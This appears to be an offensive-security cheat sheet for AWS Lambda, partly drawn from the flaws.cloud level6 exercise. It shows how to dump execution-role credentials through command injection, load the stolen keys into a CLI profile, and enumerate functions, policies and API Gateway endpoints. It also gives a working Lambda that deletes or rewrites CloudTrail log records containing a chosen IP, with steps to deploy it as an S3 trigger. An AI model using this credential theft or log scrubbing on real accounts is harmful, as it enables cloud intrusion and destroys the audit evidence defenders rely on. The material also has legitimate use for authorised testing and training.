
Lambda

Lambda functions drop their code into a read-only partition mounted at /var/task. With an interactive shell (or command execution) inside the container, inspecting the function code provides insight into what the function does and what it has access to:

ls /var/task
cat /var/task/lambda_function.py

We can retrieve the Lambda execution role credentials from the environment: run "export" (or "env") via command injection, or dump os.environ from code running inside the Lambda.
Take the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN values and configure the AWS CLI with: aws configure --profile <PROFILE_NAME>.
"aws configure" does not prompt for a session token, so you need to manually add aws_session_token to the new profile in ~/.aws/credentials.
These are temporary STS credentials; they expire after a while and need to be refreshed.
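As a convenience, the captured environment variables can be written into a CLI profile programmatically. A sketch (the profile name and file path are arbitrary; this just mirrors what aws configure plus a manual edit of ~/.aws/credentials would do):

```python
import configparser
import os
from pathlib import Path

def write_profile(profile, creds_path=None):
    """Write the Lambda execution-role credentials (AWS_ACCESS_KEY_ID,
    AWS_SECRET_ACCESS_KEY, AWS_SESSION_TOKEN) from the environment into
    a named AWS CLI profile, session token included."""
    creds_path = Path(creds_path or Path.home() / ".aws" / "credentials")
    creds_path.parent.mkdir(parents=True, exist_ok=True)
    config = configparser.ConfigParser()
    config.read(creds_path)  # keep any existing profiles
    config[profile] = {
        "aws_access_key_id": os.environ["AWS_ACCESS_KEY_ID"],
        "aws_secret_access_key": os.environ["AWS_SECRET_ACCESS_KEY"],
        "aws_session_token": os.environ["AWS_SESSION_TOKEN"],
    }
    with open(creds_path, "w") as f:
        config.write(f)
```

After running this, the profile is usable with aws --profile <PROFILE_NAME> until the token expires.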

Enumerate Lambda Functions

aws lambda list-functions --region <AWS_REGION>
aws lambda list-functions --region <AWS_REGION> --profile <PROFILE_NAME>

List Lambda Functions

>>> aws --region us-west-2 --profile level6 lambda list-functions | jq
{
  "Functions": [
    {
      "FunctionName": "Level6",
      "FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
      "Runtime": "python2.7",
      "Role": "arn:aws:iam::975426262029:role/service-role/Level6",
      "Handler": "lambda_function.lambda_handler",
      "CodeSize": 282,
      "Description": "A starter AWS Lambda function.",
      "Timeout": 3,
      "MemorySize": 128,
      "LastModified": "2017-02-27T00:24:36.054+0000",
      "CodeSha256": "2iEjBytFbH91PXEMO5R/B9DqOgZ7OG/lqoBNZh5JyFw=",
      "Version": "$LATEST",
      "TracingConfig": {
        "Mode": "PassThrough"
      },
      "RevisionId": "22f08307-9080-4403-bf4d-481ddc8dcb89"
    }
  ]
}
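The list-functions output is worth a quick triage pass: each entry exposes the execution role and the runtime. A sketch that pulls these out and flags end-of-life runtimes (the EOL set below is a hypothetical partial list, not an authoritative one):

```python
import json

def triage_functions(list_functions_output):
    """Summarise `aws lambda list-functions` JSON: function name,
    execution role ARN, and whether the runtime is end-of-life."""
    eol_runtimes = {"python2.7", "python3.6", "nodejs10.x"}  # partial, illustrative
    report = []
    for fn in json.loads(list_functions_output)["Functions"]:
        report.append({
            "name": fn["FunctionName"],
            "role": fn["Role"],
            "eol_runtime": fn.get("Runtime") in eol_runtimes,
        })
    return report
```

Against the output above this would flag Level6 as running a deprecated python2.7 runtime under the service-role/Level6 role.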

Get a Lambda Function's Resource Policy

>>> aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6 | jq
{
  "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}",
  "RevisionId": "22f08307-9080-4403-bf4d-481ddc8dcb89"
}
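The resource policy above reveals the API Gateway REST API ID (s33ppypa75) inside the AWS:SourceArn condition. A sketch for extracting it programmatically — note the Policy field is itself a JSON-encoded string nested inside the JSON response:

```python
import json
import re

def extract_api_ids(get_policy_output):
    """Pull API Gateway REST API IDs out of a Lambda resource policy
    returned by `aws lambda get-policy`."""
    # Policy is a JSON string inside the outer JSON document
    policy = json.loads(json.loads(get_policy_output)["Policy"])
    api_ids = set()
    for stmt in policy.get("Statement", []):
        arn = stmt.get("Condition", {}).get("ArnLike", {}).get("AWS:SourceArn", "")
        # execute-api ARN: arn:aws:execute-api:<region>:<account>:<api-id>/<stage>/<verb>/<path>
        m = re.match(r"arn:aws:execute-api:[^:]+:[^:]+:([^/]+)", arn)
        if m:
            api_ids.add(m.group(1))
    return api_ids
```

The extracted ID feeds straight into the apigateway get-stages call below.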

List API Gateway Stages

>>> aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75" | jq
{
  "item": [
    {
      "deploymentId": "8gppiv",
      "stageName": "Prod",
      "cacheClusterEnabled": false,
      "cacheClusterStatus": "NOT_AVAILABLE",
      "methodSettings": {},
      "tracingEnabled": false,
      "createdDate": 1488155168,
      "lastUpdatedDate": 1488155168
    }
  ]
}
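Combining the REST API ID, the region, and the stage name from get-stages yields the public invoke URL, following the standard execute-api URL pattern:

```python
def invoke_url(api_id, region, stage, path):
    """Build the public invoke URL for an API Gateway REST API stage:
    https://<api-id>.execute-api.<region>.amazonaws.com/<stage>/<path>"""
    return f"https://{api_id}.execute-api.{region}.amazonaws.com/{stage}/{path.lstrip('/')}"
```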

https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

Example

Lambda function:

import json
import urllib
import boto3
import gzip
import tempfile
import shutil
 
dirty_tag = '<IP_ADDRESS>'  # the IP/tag to scrub from the logs
 
def filter_dirty_tag(log):
    return dirty_tag in json.dumps(log)
 
s3 = boto3.client('s3')
 
def lambda_handler(event, context):
    bucket = event['Records'][0]['s3']['bucket']['name']
    key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key']).decode('utf8')
    resp = s3.get_object(Bucket=bucket, Key=key)
    gzip_tmp = tempfile.NamedTemporaryFile(delete=False)
    shutil.copyfileobj(resp['Body'], gzip_tmp)
    gzip_tmp.close()
     
    gzip_filename = gzip_tmp.name
    with gzip.open(gzip_filename, 'rb') as f:
        file_content = f.read()
     
    logs = json.loads(file_content)
 
    old_num_logs = len(logs['Records'])
    print old_num_logs
    logs['Records'] = filter(lambda x: not filter_dirty_tag(x), logs['Records'])
    print len(logs['Records'])
 
    if len(logs['Records']) == 0:
        print "Deleting empty %s" % key
        s3.delete_object(Bucket=bucket, Key=key)
    elif len(logs['Records']) == old_num_logs:
        print "Doing nothing no log records filtered"
    else:
        print "Updating %s" % key
        with gzip.open(gzip_filename, 'wb') as f:
            f.write(json.dumps(logs, separators=(',',':')))
        s3.put_object(Bucket=bucket, Key=key, Body=open(gzip_filename, 'rb'))
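The filtering step can be exercised locally. The sketch below reimplements filter_dirty_tag in Python 3 against a minimal CloudTrail-style record set — the field names and IP addresses are made-up test data, not taken from a real trail:

```python
import json

DIRTY_TAG = "198.51.100.7"  # made-up attacker IP for the demo

def filter_dirty_tag(record):
    """True when the serialised log record mentions the tagged IP."""
    return DIRTY_TAG in json.dumps(record)

logs = {"Records": [
    {"sourceIPAddress": "198.51.100.7", "eventName": "ListBuckets"},
    {"sourceIPAddress": "203.0.113.9", "eventName": "GetObject"},
]}
# keep only records that do not mention the dirty tag
logs["Records"] = [r for r in logs["Records"] if not filter_dirty_tag(r)]
```

Only the second record survives; the Lambda then rewrites (or deletes) the gzipped log object accordingly.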

Add the trigger for this function by clicking "S3" on the left-hand side of the Lambda web console. Select the S3 bucket with the logs and then click the "Add" button.

Further information:

Exploiting Lambda (Containers)

You can use /tmp to store data: its contents persist between invocations for as long as the execution environment stays warm, i.e. as long as you keep hitting the application.
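A minimal handler demonstrating this behaviour — a counter file in /tmp keeps incrementing across invocations served by the same warm container (a standalone sketch, not tied to any function in this walkthrough):

```python
import os

COUNTER = "/tmp/hit_count"  # survives while the execution environment stays warm

def lambda_handler(event, context):
    """Count how many invocations this container has served: /tmp is
    shared between invocations of the same (warm) execution environment."""
    count = 0
    if os.path.exists(COUNTER):
        with open(COUNTER) as f:
            count = int(f.read())
    count += 1
    with open(COUNTER, "w") as f:
        f.write(str(count))
    return count
```

A cold start resets the environment, so the counter drops back to 1 when a fresh container is spun up.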